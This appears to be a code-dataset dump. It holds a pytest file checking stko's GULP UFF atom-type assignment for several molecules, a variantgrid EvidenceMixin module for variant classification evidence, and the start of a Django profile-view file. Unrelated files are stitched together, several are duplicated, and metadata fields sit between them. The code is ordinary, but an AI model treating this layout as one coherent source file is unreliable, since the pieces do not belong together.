metal_ff={26: 'Fe4+2'},
),
CaseData(
molecule=stk.BuildingBlock('c1ccccc1'),
atom_types={
0: 'C_R', 1: 'C_R', 2: 'C_R',
3: 'C_R', 4: 'C_R', 5: 'C_R',
6: 'H_', 7: 'H_', 8: 'H_', 9: 'H_', 10: 'H_', 11: 'H_',
},
has_metal=False,
metal_ff=None,
),
# CaseData(
# molecule=stk.BuildingBlock(
# 'CN1C=NC2=C1C(=O)N(C(=O)N2C)C'
# ),
# atom_types={
# 0: 'C_3', 1: 'N_R', 2: 'C_R', 3: 'N_R', 4: 'C_R',
# 5: 'C_R', 6: 'C_R', 7: 'O_2', 8: 'N_R', 9: 'C_R',
# 10: 'O_2', 11: 'N_R', 12: 'C_3', 13: 'C_3',
# 14: 'H_', 15: 'H_', 16: 'H_', 17: 'H_', 18: 'H_',
# 19: 'H_', 20: 'H_', 21: 'H_', 22: 'H_', 23: 'H_',
# },
# has_metal=False,
# metal_ff=None,
# ),
CaseData(
molecule=stk.BuildingBlock(
'C1=CC(=CC(=C1)C#CC2=CN=CC=C2)C#CC3=CN=CC=C3'
),
atom_types={
0: 'C_R', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R',
5: 'C_R', 6: 'C_1', 7: 'C_1', 8: 'C_R', 9: 'C_R',
10: 'N_R', 11: 'C_R', 12: 'C_R', 13: 'C_R', 14: 'C_1',
15: 'C_1', 16: 'C_R', 17: 'C_R', 18: 'N_R', 19: 'C_R',
20: 'C_R', 21: 'C_R', 22: 'H_', 23: 'H_', 24: 'H_',
25: 'H_', 26: 'H_', 27: 'H_', 28: 'H_', 29: 'H_',
30: 'H_', 31: 'H_', 32: 'H_', 33: 'H_',
},
has_metal=False,
metal_ff=None,
),
# CaseData(
# molecule=stk.BuildingBlock(
# 'O=C1c2ccc(cc2Nc3cc(ccc13)C#Cc4cccnc4)C#Cc5cccnc5'
# ),
# atom_types={
# 0: 'O_2', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R',
# 5: 'C_R', 6: 'C_R', 7: 'C_R', 8: 'N_R', 9: 'C_R',
# 10: 'C_R', 11: 'C_R', 12: 'C_R', 13: 'C_R',
# 14: 'C_R',
# 15: 'C_1', 16: 'C_1', 17: 'C_R', 18: 'C_R',
# 19: 'C_R',
# 20: 'C_R', 21: 'N_R', 22: 'C_R', 23: 'C_1',
# 24: 'C_1',
# 25: 'C_R', 26: 'C_R', 27: 'C_R', 28: 'C_R',
# 29: 'N_R',
# 30: 'C_R', 31: 'H_', 32: 'H_', 33: 'H_', 34: 'H_',
# 35: 'H_', 36: 'H_', 37: 'H_', 38: 'H_', 39: 'H_',
# 40: 'H_', 41: 'H_', 42: 'H_', 43: 'H_', 44: 'H_',
# 45: 'H_',
# },
# has_metal=False,
# metal_ff=None,
# ),
CaseData(
molecule=stk.BuildingBlock('C1CCC(C(C1)N)N'),
atom_types={
0: 'C_3', 1: 'C_3', 2: 'C_3',
3: 'C_3', 4: 'C_3', 5: 'C_3',
6: 'N_3', 7: 'N_3',
8: 'H_', 9: 'H_', 10: 'H_', 11: 'H_',
12: 'H_', 13: 'H_', 14: 'H_', 15: 'H_',
16: 'H_', 17: 'H_', 18: 'H_', 19: 'H_',
20: 'H_', 21: 'H_',
},
has_metal=False,
metal_ff=None,
),
# CaseData(
# molecule=stk.BuildingBlock('C1=C(C=C(C=C1C=O)C=O)C=O'),
# atom_types={
# 0: 'C_R', 1: 'C_R', 2: 'C_R',
# 3: 'C_R', 4: 'C_R', 5: 'C_R',
# 6: 'C_2', 7: 'O_2', 8: 'C_2',
# 9: 'O_2', 10: 'C_2', 11: 'O_2',
# 12: 'H_', 13: 'H_', 14: 'H_',
# 15: 'H_', 16: 'H_', 17: 'H_',
# },
# has_metal=False,
# metal_ff=None,
# ),
CaseData(
molecule=stk.BuildingBlock('CC=O'),
atom_types={
0: 'C_3', 1: 'C_2', 2: 'O_2',
3: 'H_', 4: 'H_', 5: 'H_', 6: 'H_',
},
has_metal=False,
metal_ff=None,
),
),
)
def test_molecule(request):
return request.param
def test_assign_FF(test_molecule):
gulp_opt = GulpUFFOptimizer(
gulp_path='not_required',
metal_FF=test_molecule.metal_ff,
)
# Assign the force field.
if test_molecule.has_metal and test_molecule.metal_ff is None:
with pytest.raises(ExpectedMetal):
gulp_opt.assign_FF(test_molecule.molecule)
else:
gulp_opt.assign_FF(test_molecule.molecule)
assert (
len(gulp_opt.atom_labels) == len(test_molecule.atom_types)
)
for aid in gulp_opt.atom_labels:
print(aid)
expected_type = test_molecule.atom_types[aid]
test = gulp_opt.atom_labels[aid][0]
assert expected_type == test
| import pytest
import stk
from stko import GulpUFFOptimizer, ExpectedMetal
pd_metal = stk.BuildingBlock(
smiles='[Pd+2]',
functional_groups=(
stk.SingleAtom(stk.Pd(0, charge=2))
for i in range(4)
),
position_matrix=[[0, 0, 0]],
)
# Define a bidentate ligand with two functional groups.
bidentate_ligand = stk.BuildingBlock(
smiles='NCCN',
functional_groups=[
stk.SmartsFunctionalGroupFactory(
smarts='[#7]~[#6]',
bonders=(0, ),
deleters=(),
),
]
)
# Construct a cis-protected square planar metal complex.
complex = stk.ConstructedMolecule(
stk.metal_complex.BidentateSquarePlanar(
metals=pd_metal,
ligands=bidentate_ligand,
)
)
class CaseData:
"""
A test case.
Attributes
----------
molecule : :class:`.Molecule`
The molecule to be tested.
atom_types : :class:`dict`
The smiles for the molecule.
has_metal : :class:`bool`
``True`` if a metal atom is in molecule.
metal_ff : :class:`dict` or :class:`NoneType`
The position matrix of the molecule.
"""
def __init__(self, molecule, atom_types, has_metal, metal_ff):
self.molecule = molecule
self.atom_types = atom_types
self.has_metal = has_metal
self.metal_ff = metal_ff
@pytest.fixture(
params=(
CaseData(
molecule=stk.BuildingBlock('CCC'),
atom_types={
0: 'C_3', 1: 'C_3', 2: 'C_3',
3: 'H_', 4: 'H_', 5: 'H_',
6: 'H_', 7: 'H_',
8: 'H_', 9: 'H_', 10: 'H_',
},
has_metal=False,
metal_ff=None,
),
# CaseData(
# molecule=stk.BuildingBlock.init_from_molecule(complex),
# atom_types={},
# has_metal=True,
# metal_ff=None,
# ),
CaseData(
molecule=stk.BuildingBlock.init_from_molecule(complex),
atom_types={
0: 'Pd4+2',
1: 'N_3', 2: 'C_3', 3: 'C_3', 4: 'N_3',
5: 'H_', 6: 'H_', 7: 'H_', 8: 'H_', 9: 'H_',
10: 'H_', 11: 'H_', 12: 'H_',
13: 'N_3', 14: 'C_3', 15: 'C_3', 16: 'N_3',
17: 'H_', 18: 'H_', 19: 'H_', 20: 'H_', 21: 'H_',
22: 'H_', 23: 'H_', 24: 'H_',
},
has_metal=True,
metal_ff={46: 'Pd4+2'},
),
CaseData(
molecule=stk.BuildingBlock('CCC'),
atom_types={
0: 'C_3', 1: 'C_3', 2: 'C_3',
3: 'H_', 4: 'H_', 5: 'H_',
6: 'H_', 7: 'H_',
8: 'H_', 9: 'H_', 10: 'H_',
},
has_metal=False,
metal_ff={26: 'Fe4+2'},
),
CaseData(
molecule=stk.BuildingBlock('c1ccccc1'),
atom_types={
0: 'C_R', 1: 'C_R', 2: 'C_R',
3: 'C_R', 4: 'C_R', 5: 'C_R',
6: 'H_', 7: 'H_', 8: 'H_', 9: 'H_', 10: 'H_', 11: 'H_',
},
has_metal=False,
metal_ff=None,
),
# CaseData(
# molecule=stk.BuildingBlock(
# 'CN1C=NC2=C1C(=O)N(C(=O)N2C)C'
# ),
# atom_types={
# 0: 'C_3', 1: 'N_R', 2: 'C_R', 3: 'N_R', 4: 'C_R',
# 5: 'C_R', 6: 'C_R', 7: 'O_2', 8: 'N_R', 9: 'C_R',
# 10: 'O_2', 11: 'N_R', 12: 'C_3', 13: 'C_3',
# 14: 'H_', 15: 'H_', 16: 'H_', 17: 'H_', 18: 'H_',
# 19: 'H_', 20: 'H_', 21: 'H_', 22: 'H_', 23: 'H_',
# },
# has_metal=False,
# metal_ff=None,
# ),
CaseData(
molecule=stk.BuildingBlock(
'C1=CC(=CC(=C1)C#CC2=CN=CC=C2)C#CC3=CN=CC=C3'
),
atom_types={
0: 'C_R', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R',
5: 'C_R', 6: 'C_1', 7: 'C_1', 8: 'C_R', 9: 'C_R',
10: 'N_R', 11: 'C_R', 12: 'C_R', 13: 'C_R', 14: 'C_1',
15: 'C_1', 16: 'C_R', 17: 'C_R', 18: 'N_R', 19: 'C_R',
20: 'C_R', 21: 'C_R', 22: 'H_', 23: 'H_', 24: 'H_',
25: 'H_', 26: 'H_', 27: 'H_', 28: 'H_', 29: 'H_',
30: 'H_', 31: 'H_', 32: 'H_', 33: 'H_',
},
has_metal=False,
metal_ff=None,
),
# CaseData(
# molecule=stk.BuildingBlock(
# 'O=C1c2ccc(cc2Nc3cc(ccc13)C#Cc4cccnc4)C#Cc5cccnc5'
# ),
# atom_types={
# 0: 'O_2', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R',
# 5: 'C_R', 6: 'C_R', 7: 'C_R', 8: 'N_R', 9: 'C_R',
# 10: 'C_R', 11: 'C_R', 12: 'C_R', 13: 'C_R',
# 14: 'C_R',
# 15: 'C_1', 16: 'C_1', 17: 'C_R', 18: 'C_R',
# 19: 'C_R',
# 20: 'C_R', 21: 'N_R', 22: 'C_R', 23: 'C_1',
# 24: 'C_1',
# 25: 'C_R', 26: 'C_R', 27: 'C_R', 28: 'C_R',
# 29: 'N_R',
# 30: 'C_R', 31: 'H_', 32: 'H_', 33: 'H_', 34: 'H_',
# 35: 'H_', 36: 'H_', 37: 'H_', 38: 'H_', 39: 'H_',
# 40: 'H_', 41: 'H_', 42: 'H_', 43: 'H_', 44: 'H_',
# 45: 'H_',
# },
# has_metal=False,
# metal_ff=None,
# ),
CaseData(
molecule=stk.BuildingBlock('C1CCC(C(C1)N)N'),
atom_types={
0: 'C_3', 1: 'C_3', 2: 'C_3',
3: 'C_3', 4: 'C_3', 5: 'C_3',
6: 'N_3', 7: 'N_3',
8: 'H_', 9: 'H_', 10: 'H_', 11: 'H_',
12: 'H_', 13: 'H_', 14: 'H_', 15: 'H_',
16: 'H_', 17: 'H_', 18: 'H_', 19: 'H_',
20: 'H_', 21: 'H_',
},
has_metal=False,
metal_ff=None,
),
# CaseData(
# molecule=stk.BuildingBlock('C1=C(C=C(C=C1C=O)C=O)C=O'),
# atom_types={
# 0: 'C_R', 1: 'C_R', 2: 'C_R',
# 3: 'C_R', 4: 'C_R', 5: 'C_R',
# 6: 'C_2', 7: 'O_2', 8: 'C_2',
# 9: 'O_2', 10: 'C_2', 11: 'O_2',
# 12: 'H_', 13: 'H_', 14: 'H_',
# 15: 'H_', 16: 'H_', 17: 'H_',
# },
# has_metal=False,
# metal_ff=None,
# ),
CaseData(
molecule=stk.BuildingBlock('CC=O'),
atom_types={
0: 'C_3', 1: 'C_2', 2: 'O_2',
3: 'H_', 4: 'H_', 5: 'H_', 6: 'H_',
},
has_metal=False,
metal_ff=None,
),
),
)
def test_molecule(request):
return request.param
def test_assign_FF(test_molecule):
gulp_opt = GulpUFFOptimizer(
gulp_path='not_required',
metal_FF=test_molecule.metal_ff,
)
# Assign the force field.
if test_molecule.has_metal and test_molecule.metal_ff is None:
with pytest.raises(ExpectedMetal):
gulp_opt.assign_FF(test_molecule.molecule)
else:
gulp_opt.assign_FF(test_molecule.molecule)
assert (
len(gulp_opt.atom_labels) == len(test_molecule.atom_types)
)
for aid in gulp_opt.atom_labels:
print(aid)
expected_type = test_molecule.atom_types[aid]
test = gulp_opt.atom_labels[aid][0]
assert expected_type == test
| en | 0.286879 | # Define a bidentate ligand with two functional groups. #7]~[#6]', # Construct a cis-protected square planar metal complex. A test case. Attributes ---------- molecule : :class:`.Molecule` The molecule to be tested. atom_types : :class:`dict` The smiles for the molecule. has_metal : :class:`bool` ``True`` if a metal atom is in molecule. metal_ff : :class:`dict` or :class:`NoneType` The position matrix of the molecule. # CaseData( # molecule=stk.BuildingBlock.init_from_molecule(complex), # atom_types={}, # has_metal=True, # metal_ff=None, # ), # CaseData( # molecule=stk.BuildingBlock( # 'CN1C=NC2=C1C(=O)N(C(=O)N2C)C' # ), # atom_types={ # 0: 'C_3', 1: 'N_R', 2: 'C_R', 3: 'N_R', 4: 'C_R', # 5: 'C_R', 6: 'C_R', 7: 'O_2', 8: 'N_R', 9: 'C_R', # 10: 'O_2', 11: 'N_R', 12: 'C_3', 13: 'C_3', # 14: 'H_', 15: 'H_', 16: 'H_', 17: 'H_', 18: 'H_', # 19: 'H_', 20: 'H_', 21: 'H_', 22: 'H_', 23: 'H_', # }, # has_metal=False, # metal_ff=None, # ), #CC2=CN=CC=C2)C#CC3=CN=CC=C3' # CaseData( # molecule=stk.BuildingBlock( # 'O=C1c2ccc(cc2Nc3cc(ccc13)C#Cc4cccnc4)C#Cc5cccnc5' # ), # atom_types={ # 0: 'O_2', 1: 'C_R', 2: 'C_R', 3: 'C_R', 4: 'C_R', # 5: 'C_R', 6: 'C_R', 7: 'C_R', 8: 'N_R', 9: 'C_R', # 10: 'C_R', 11: 'C_R', 12: 'C_R', 13: 'C_R', # 14: 'C_R', # 15: 'C_1', 16: 'C_1', 17: 'C_R', 18: 'C_R', # 19: 'C_R', # 20: 'C_R', 21: 'N_R', 22: 'C_R', 23: 'C_1', # 24: 'C_1', # 25: 'C_R', 26: 'C_R', 27: 'C_R', 28: 'C_R', # 29: 'N_R', # 30: 'C_R', 31: 'H_', 32: 'H_', 33: 'H_', 34: 'H_', # 35: 'H_', 36: 'H_', 37: 'H_', 38: 'H_', 39: 'H_', # 40: 'H_', 41: 'H_', 42: 'H_', 43: 'H_', 44: 'H_', # 45: 'H_', # }, # has_metal=False, # metal_ff=None, # ), # CaseData( # molecule=stk.BuildingBlock('C1=C(C=C(C=C1C=O)C=O)C=O'), # atom_types={ # 0: 'C_R', 1: 'C_R', 2: 'C_R', # 3: 'C_R', 4: 'C_R', 5: 'C_R', # 6: 'C_2', 7: 'O_2', 8: 'C_2', # 9: 'O_2', 10: 'C_2', 11: 'O_2', # 12: 'H_', 13: 'H_', 14: 'H_', # 15: 'H_', 16: 'H_', 17: 'H_', # }, # has_metal=False, # metal_ff=None, # ), # Assign the force field. | 2.143064 | 2 |
classification/models/evidence_mixin.py | SACGF/variantgrid | 5 | 6613985 | import re
from functools import total_ordering
from typing import Dict, Any, Mapping, Optional, Union, List, TypedDict
from django.conf import settings
from lazy import lazy
from annotation.models import Citation, CitationSource
from classification.enums import SpecialEKeys, CriteriaEvaluation
from genes.hgvs import CHGVS, PHGVS
from library.log_utils import report_message
from library.utils import empty_to_none
from snpdb.models import GenomeBuild
class VCDbRefDict(TypedDict, total=False):
id: str
db: str
idx: Union[str, int]
url: str
summary: str
internal_id: int
class VCValidation(TypedDict, total=True):
severity: str
code: str
message: str
options: Optional[Any]
class VCBlobDict(TypedDict, total=False):
value: Any
note: str
explain: str
immutable: str
db_refs: List[VCDbRefDict]
validation: List[VCValidation]
VCStoreValue = VCBlobDict
VCPatchValue = Union[None, VCStoreValue]
VCStore = Dict[str, VCStoreValue]
VCPatch = Dict[str, VCPatchValue]
@total_ordering
class CriteriaStrength:
@property
def strength_value(self) -> int:
try:
return CriteriaEvaluation.ALL_STRENGTHS.index(self.strength)
except:
return 0
def __init__(self, ekey: 'EvidenceKey', strength: Optional[str]):
self.ekey = ekey
self.strength = strength or ekey.default_crit_evaluation
def __str__(self) -> str:
if self.ekey.namespace:
return f'{self.ekey.pretty_label}_{self.strength}'
if self.ekey.default_crit_evaluation == self.strength:
return self.ekey.pretty_label
criteria_first_letter = self.ekey.key[0].upper()
suffix = self.strength
if criteria_first_letter in {'B', 'P'} and suffix[0] == criteria_first_letter:
suffix = suffix[1:]
return f'{self.ekey.pretty_label}_{suffix}'
def __eq__(self, other) -> bool:
if not isinstance(other, CriteriaStrength):
return False
return self.ekey == other.ekey and self.strength == other.strength
def __hash__(self):
return hash(self.ekey) + hash(self.strength)
def __lt__(self, other) -> bool:
if not isinstance(other, CriteriaStrength):
raise ValueError(f'Cannot sort CriteriaStrength and {other}')
if self.strength_value == other.strength_value:
return self.ekey.pretty_label < other.ekey.pretty_label
return self.strength_value < other.strength_value
class EvidenceMixin:
"""
For methods common between Classification and ClassificationModification
Specifically anything that simply needs there to be a dictionary of evidence
"""
@property
def _evidence(self) -> VCStore:
raise NotImplementedError('EvidenceMixin must implement evidence_dict')
@staticmethod
def get_optional_value_from(evidence: dict, key: str):
if evidence is None:
return None
blob = evidence.get(key)
if blob is None:
return None
if not isinstance(blob, Mapping):
return blob
return blob.get('value')
def get(self, key: str, default=None):
value = self.get_optional_value_from(self._evidence or {}, key)
if value is None:
return default
return value
def __getitem__(self, key: str):
value = self.get(key)
if value is None:
raise KeyError(f'No value for {key}')
return value
def get_genome_build(self) -> GenomeBuild:
build_name: str
try:
build_name = self[SpecialEKeys.GENOME_BUILD]
except KeyError:
raise ValueError("Classification does not have a value for genome build")
try:
return GenomeBuild.get_name_or_alias(build_name)
except GenomeBuild.DoesNotExist:
raise ValueError(f"Unsupported GenomeBuild {build_name}")
@lazy
def db_refs(self) -> List[Dict]:
all_db_refs = []
for blob in self._evidence.values():
db_refs = blob.get('db_refs')
if db_refs:
all_db_refs.extend(db_refs)
return all_db_refs
@property
def citations(self) -> List[Citation]:
"""
Returns the entire list of citations through the evidence
:return: A list of Citations
"""
citations = []
for db_ref in self.db_refs:
source = CitationSource.CODES.get(db_ref.get('db'))
if source:
citation, _ = Citation.objects.get_or_create(citation_source=source, citation_id=db_ref.get('idx'))
citations.append(citation)
return citations
def criteria_strength_summary(self, ekeys: Optional['EvidenceKeyMap'] = None, only_acmg: bool = False) -> str:
if ekeys is None:
from classification.models import EvidenceKeyMap
ekeys = EvidenceKeyMap.instance()
criteria: List[CriteriaStrength] = []
for ek in ekeys.criteria():
if only_acmg and ek.namespace:
continue
strength = self.get(ek.key)
if CriteriaEvaluation.is_met(strength): # exclude neutral, not met, not applicable
criteria.append(CriteriaStrength(ek, strength))
criteria.sort()
return ", ".join([str(c) for c in criteria])
@lazy
def c_parts(self) -> CHGVS:
return CHGVS(self.get(SpecialEKeys.C_HGVS) or "")
@lazy
def p_parts(self) -> PHGVS:
return PHGVS.parse(self.get(SpecialEKeys.P_HGVS), override_is_confirmed_to=False)
@property
def transcript(self) -> Optional[str]:
"""
Returns the transcript exactly how it was imported (don't bump versions even if it's correct to do so)
:return:
"""
if c_hgvs := self.get(SpecialEKeys.C_HGVS):
parts = CHGVS(c_hgvs)
if parts.transcript:
return parts.transcript
for transcript_key in settings.VARIANT_ANNOTATION_TRANSCRIPT_PREFERENCES:
transcript_key = {
'lrg_identifier': SpecialEKeys.LRG_ID,
'refseq_transcript_accession': SpecialEKeys.REFSEQ_TRANSCRIPT_ID,
'ensembl_transcript_accession': SpecialEKeys.ENSEMBL_TRANSCRIPT_ID
}.get(transcript_key)
if transcript := self.get(transcript_key):
return transcript
# note old code would try to fix the transcript version of the record
# but only if refseq_transcript_id and ensemble were blank
"""
matcher = HGVSMatcher(self.get_genome_build())
transcript_id = matcher.get_transcript_id(c_hgvs, transcript_version=True)
if transcript_id:
return transcript_id
"""
return None
def calc_clinical_significance_choice(self) -> Optional[str]:
cs = self.get(SpecialEKeys.CLINICAL_SIGNIFICANCE)
if not cs:
return None
from classification.models import EvidenceKeyMap
options = EvidenceKeyMap.cached_key(SpecialEKeys.CLINICAL_SIGNIFICANCE).matched_options(cs)
if options:
return options[0].get('vg')
@staticmethod
def _clean_key(key):
key = str(key).lower()
# Remove all non-word characters (everything except numbers and letters)
key = re.sub(r"[^\w\s:]", ' ', key).strip()
# Replace all runs of whitespace with a single underscore
key = re.sub(r"\s+", '_', key)
return key
@staticmethod
def to_patch(raw: Dict[str, Any]) -> VCPatch:
"""
Cleans up a dictionary significantly ready for processing.
Converts keys to numbers and letters, and all whitespace to underscores.
For each entry in the source dict -
* Converts Nones to dicts with None for all entries
* Converts values to dicts with an entry of value (and None entries for note and explain)
* Tidies Dicts to have all empty to none
:param raw: A dictionary, presumably from JSON
:return: A VCStore where all keys are clean str keys and all values are dicts
"""
clean: VCPatch = {}
for key, value_obj in raw.items():
key = EvidenceMixin._clean_key(key)
if key in clean:
report_message(message=f'Multiple keys have been normalised to {key}',
extra_data={'raw_keys': list(raw.keys())},
level='warning')
if value_obj is not None:
if not isinstance(value_obj, Mapping):
value_obj = {"value": empty_to_none(value_obj), "note": None, "explain": None}
else:
for attr_key, attr_value in value_obj.items():
value_obj[attr_key] = empty_to_none(attr_value)
clean[key] = value_obj
return clean
@staticmethod
def patch_with(target: dict, patch: dict, tidy_nones=False):
"""
Update the evidence with normalised patch values.
"""
for key, value in patch.items():
# providing None means to wipe the whole object
if value is None:
target.pop(key, None)
elif key not in target:
target[key] = value
else:
existing = target[key]
for sub_key, sub_value in value.items():
if sub_value is None:
existing.pop(sub_key, None)
else:
existing[sub_key] = sub_value
if tidy_nones:
for key in patch.keys():
if (blob := target.get(key)) and isinstance(blob, dict):
for value in blob.values():
if value is not None:
break
else:
target.pop(key, None)
| import re
from functools import total_ordering
from typing import Dict, Any, Mapping, Optional, Union, List, TypedDict
from django.conf import settings
from lazy import lazy
from annotation.models import Citation, CitationSource
from classification.enums import SpecialEKeys, CriteriaEvaluation
from genes.hgvs import CHGVS, PHGVS
from library.log_utils import report_message
from library.utils import empty_to_none
from snpdb.models import GenomeBuild
class VCDbRefDict(TypedDict, total=False):
id: str
db: str
idx: Union[str, int]
url: str
summary: str
internal_id: int
class VCValidation(TypedDict, total=True):
severity: str
code: str
message: str
options: Optional[Any]
class VCBlobDict(TypedDict, total=False):
value: Any
note: str
explain: str
immutable: str
db_refs: List[VCDbRefDict]
validation: List[VCValidation]
VCStoreValue = VCBlobDict
VCPatchValue = Union[None, VCStoreValue]
VCStore = Dict[str, VCStoreValue]
VCPatch = Dict[str, VCPatchValue]
@total_ordering
class CriteriaStrength:
@property
def strength_value(self) -> int:
try:
return CriteriaEvaluation.ALL_STRENGTHS.index(self.strength)
except:
return 0
def __init__(self, ekey: 'EvidenceKey', strength: Optional[str]):
self.ekey = ekey
self.strength = strength or ekey.default_crit_evaluation
def __str__(self) -> str:
if self.ekey.namespace:
return f'{self.ekey.pretty_label}_{self.strength}'
if self.ekey.default_crit_evaluation == self.strength:
return self.ekey.pretty_label
criteria_first_letter = self.ekey.key[0].upper()
suffix = self.strength
if criteria_first_letter in {'B', 'P'} and suffix[0] == criteria_first_letter:
suffix = suffix[1:]
return f'{self.ekey.pretty_label}_{suffix}'
def __eq__(self, other) -> bool:
if not isinstance(other, CriteriaStrength):
return False
return self.ekey == other.ekey and self.strength == other.strength
def __hash__(self):
return hash(self.ekey) + hash(self.strength)
def __lt__(self, other) -> bool:
if not isinstance(other, CriteriaStrength):
raise ValueError(f'Cannot sort CriteriaStrength and {other}')
if self.strength_value == other.strength_value:
return self.ekey.pretty_label < other.ekey.pretty_label
return self.strength_value < other.strength_value
class EvidenceMixin:
"""
For methods common between Classification and ClassificationModification
Specifically anything that simply needs there to be a dictionary of evidence
"""
@property
def _evidence(self) -> VCStore:
raise NotImplementedError('EvidenceMixin must implement evidence_dict')
@staticmethod
def get_optional_value_from(evidence: dict, key: str):
if evidence is None:
return None
blob = evidence.get(key)
if blob is None:
return None
if not isinstance(blob, Mapping):
return blob
return blob.get('value')
def get(self, key: str, default=None):
value = self.get_optional_value_from(self._evidence or {}, key)
if value is None:
return default
return value
def __getitem__(self, key: str):
value = self.get(key)
if value is None:
raise KeyError(f'No value for {key}')
return value
def get_genome_build(self) -> GenomeBuild:
build_name: str
try:
build_name = self[SpecialEKeys.GENOME_BUILD]
except KeyError:
raise ValueError("Classification does not have a value for genome build")
try:
return GenomeBuild.get_name_or_alias(build_name)
except GenomeBuild.DoesNotExist:
raise ValueError(f"Unsupported GenomeBuild {build_name}")
@lazy
def db_refs(self) -> List[Dict]:
all_db_refs = []
for blob in self._evidence.values():
db_refs = blob.get('db_refs')
if db_refs:
all_db_refs.extend(db_refs)
return all_db_refs
@property
def citations(self) -> List[Citation]:
"""
Returns the entire list of citations through the evidence
:return: A list of Citations
"""
citations = []
for db_ref in self.db_refs:
source = CitationSource.CODES.get(db_ref.get('db'))
if source:
citation, _ = Citation.objects.get_or_create(citation_source=source, citation_id=db_ref.get('idx'))
citations.append(citation)
return citations
def criteria_strength_summary(self, ekeys: Optional['EvidenceKeyMap'] = None, only_acmg: bool = False) -> str:
if ekeys is None:
from classification.models import EvidenceKeyMap
ekeys = EvidenceKeyMap.instance()
criteria: List[CriteriaStrength] = []
for ek in ekeys.criteria():
if only_acmg and ek.namespace:
continue
strength = self.get(ek.key)
if CriteriaEvaluation.is_met(strength): # exclude neutral, not met, not applicable
criteria.append(CriteriaStrength(ek, strength))
criteria.sort()
return ", ".join([str(c) for c in criteria])
@lazy
def c_parts(self) -> CHGVS:
return CHGVS(self.get(SpecialEKeys.C_HGVS) or "")
@lazy
def p_parts(self) -> PHGVS:
return PHGVS.parse(self.get(SpecialEKeys.P_HGVS), override_is_confirmed_to=False)
@property
def transcript(self) -> Optional[str]:
"""
Returns the transcript exactly how it was imported (don't bump versions even if it's correct to do so)
:return:
"""
if c_hgvs := self.get(SpecialEKeys.C_HGVS):
parts = CHGVS(c_hgvs)
if parts.transcript:
return parts.transcript
for transcript_key in settings.VARIANT_ANNOTATION_TRANSCRIPT_PREFERENCES:
transcript_key = {
'lrg_identifier': SpecialEKeys.LRG_ID,
'refseq_transcript_accession': SpecialEKeys.REFSEQ_TRANSCRIPT_ID,
'ensembl_transcript_accession': SpecialEKeys.ENSEMBL_TRANSCRIPT_ID
}.get(transcript_key)
if transcript := self.get(transcript_key):
return transcript
# note old code would try to fix the transcript version of the record
# but only if refseq_transcript_id and ensemble were blank
"""
matcher = HGVSMatcher(self.get_genome_build())
transcript_id = matcher.get_transcript_id(c_hgvs, transcript_version=True)
if transcript_id:
return transcript_id
"""
return None
def calc_clinical_significance_choice(self) -> Optional[str]:
cs = self.get(SpecialEKeys.CLINICAL_SIGNIFICANCE)
if not cs:
return None
from classification.models import EvidenceKeyMap
options = EvidenceKeyMap.cached_key(SpecialEKeys.CLINICAL_SIGNIFICANCE).matched_options(cs)
if options:
return options[0].get('vg')
@staticmethod
def _clean_key(key):
key = str(key).lower()
# Remove all non-word characters (everything except numbers and letters)
key = re.sub(r"[^\w\s:]", ' ', key).strip()
# Replace all runs of whitespace with a single underscore
key = re.sub(r"\s+", '_', key)
return key
@staticmethod
def to_patch(raw: Dict[str, Any]) -> VCPatch:
"""
Cleans up a dictionary significantly ready for processing.
Converts keys to numbers and letters, and all whitespace to underscores.
For each entry in the source dict -
* Converts Nones to dicts with None for all entries
* Converts values to dicts with an entry of value (and None entries for note and explain)
* Tidies Dicts to have all empty to none
:param raw: A dictionary, presumably from JSON
:return: A VCStore where all keys are clean str keys and all values are dicts
"""
clean: VCPatch = {}
for key, value_obj in raw.items():
key = EvidenceMixin._clean_key(key)
if key in clean:
report_message(message=f'Multiple keys have been normalised to {key}',
extra_data={'raw_keys': list(raw.keys())},
level='warning')
if value_obj is not None:
if not isinstance(value_obj, Mapping):
value_obj = {"value": empty_to_none(value_obj), "note": None, "explain": None}
else:
for attr_key, attr_value in value_obj.items():
value_obj[attr_key] = empty_to_none(attr_value)
clean[key] = value_obj
return clean
@staticmethod
def patch_with(target: dict, patch: dict, tidy_nones=False):
"""
Update the evidence with normalised patch values.
"""
for key, value in patch.items():
# providing None means to wipe the whole object
if value is None:
target.pop(key, None)
elif key not in target:
target[key] = value
else:
existing = target[key]
for sub_key, sub_value in value.items():
if sub_value is None:
existing.pop(sub_key, None)
else:
existing[sub_key] = sub_value
if tidy_nones:
for key in patch.keys():
if (blob := target.get(key)) and isinstance(blob, dict):
for value in blob.values():
if value is not None:
break
else:
target.pop(key, None)
| en | 0.82934 | For methods common between Classification and ClassificationModification Specifically anything that simply needs there to be a dictionary of evidence Returns the entire list of citations through the evidence :return: A list of Citations # exclude neutral, not met, not applicable Returns the transcript exactly how it was imported (don't bump versions even if it's correct to do so) :return: # note old code would try to fix the transcript version of the record # but only if refseq_transcript_id and ensemble were blank matcher = HGVSMatcher(self.get_genome_build()) transcript_id = matcher.get_transcript_id(c_hgvs, transcript_version=True) if transcript_id: return transcript_id # Remove all non-word characters (everything except numbers and letters) # Replace all runs of whitespace with a single underscore Cleans up a dictionary significantly ready for processing. Converts keys to numbers and letters, and all whitespace to underscores. For each entry in the source dict - * Converts Nones to dicts with None for all entries * Converts values to dicts with an entry of value (and None entries for note and explain) * Tidies Dicts to have all empty to none :param raw: A dictionary, presumably from JSON :return: A VCStore where all keys are clean str keys and all values are dicts Update the evidence with normalised patch values. # providing None means to wipe the whole object | 1.987213 | 2 |
oauth/users/views.py | lichaoxiang/My-Django-Allauth | 1 | 6613986 | from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from .models import UserProfile
from .forms import ProfileForm
@login_required
def profile(request):
'''展示个人资料'''
user = request.user
return render(request, 'users/profile.html', {'user':user})
@login_required
def change_profile(request):
'''更新个人资料'''
if request.method == 'POST':
# instance参数表示用model实例来初始化表单,这样就可以达到通过表单来更新数据
form = ProfileForm(request.POST, instance=request.user)
if form.is_valid():
form.save()
# 添加一条信息,表单验证成功就重定向到个人信息页面
messages.add_message(request, messages.SUCCESS, '个人信息更新成功!')
return redirect('users:profile')
else:
# 不是POST请求就返回空表单
form = ProfileForm(instance=request.user)
return render(request, 'users/change_profile.html', context={'form': form}) | from django.shortcuts import render, redirect
from django.contrib.auth.decorators import login_required
from django.contrib import messages
from .models import UserProfile
from .forms import ProfileForm
